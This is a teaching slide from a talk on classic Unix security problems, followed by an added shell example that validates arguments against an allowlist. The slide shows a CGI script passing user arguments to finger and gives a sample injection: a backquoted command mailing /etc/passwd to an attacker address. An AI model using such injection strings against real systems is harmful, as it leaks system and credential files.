Classic Unix Security Problems | 29
$FINGER $*
$* is the script's command-line arguments
Arguments are supplied by the user
What if the arguments are:
`Mail badguy@treachery.com < /etc/passwd`
Note backquotes
If httpd is running as root, even worse can occur
In 1994, this was very shocking
Perl's taint feature was put in to help deal with this sort of thing
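
One way to guard a shell script like this, as an added example that is not part of the original slides: check every user-supplied argument against an allowlist, then pass the arguments on as quoted, separate words. The function names are hypothetical, and FINGER defaults to `echo` here (an assumption) so the block runs without a finger binary.

```shell
#!/bin/sh
# Added example, not code from the original slides.
# Assumption: FINGER falls back to `echo` so this runs on a machine without finger.
FINGER=${FINGER:-echo}

# valid_finger_arg ARG   (hypothetical helper)
# Accept only a login name, optionally followed by @host.
# Returns 0 when ARG is acceptable, 1 otherwise.
valid_finger_arg() {
    case $1 in
        '')  return 1 ;;                   # empty argument
        -*)  return 1 ;;                   # would be read as an option
        *[!A-Za-z0-9._@-]*) return 1 ;;    # any character outside the allowlist:
                                           # backquotes, $, <, >, |, ;, spaces, ...
    esac
    return 0
}

# safe_finger ARG...   (hypothetical wrapper)
# Refuses the whole request if any argument fails the check.
safe_finger() {
    for arg in "$@"; do
        if ! valid_finger_arg "$arg"; then
            echo "safe_finger: rejected argument" >&2
            return 1
        fi
    done
    # "$@" keeps each argument as one word: no word splitting, no globbing,
    # and nothing is handed back to a shell for a second round of parsing.
    "$FINGER" "$@"
}
```

Rejecting everything outside a small known-good character set is more robust than trying to list the dangerous characters.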
Copyright © 2005 M. J. Dominus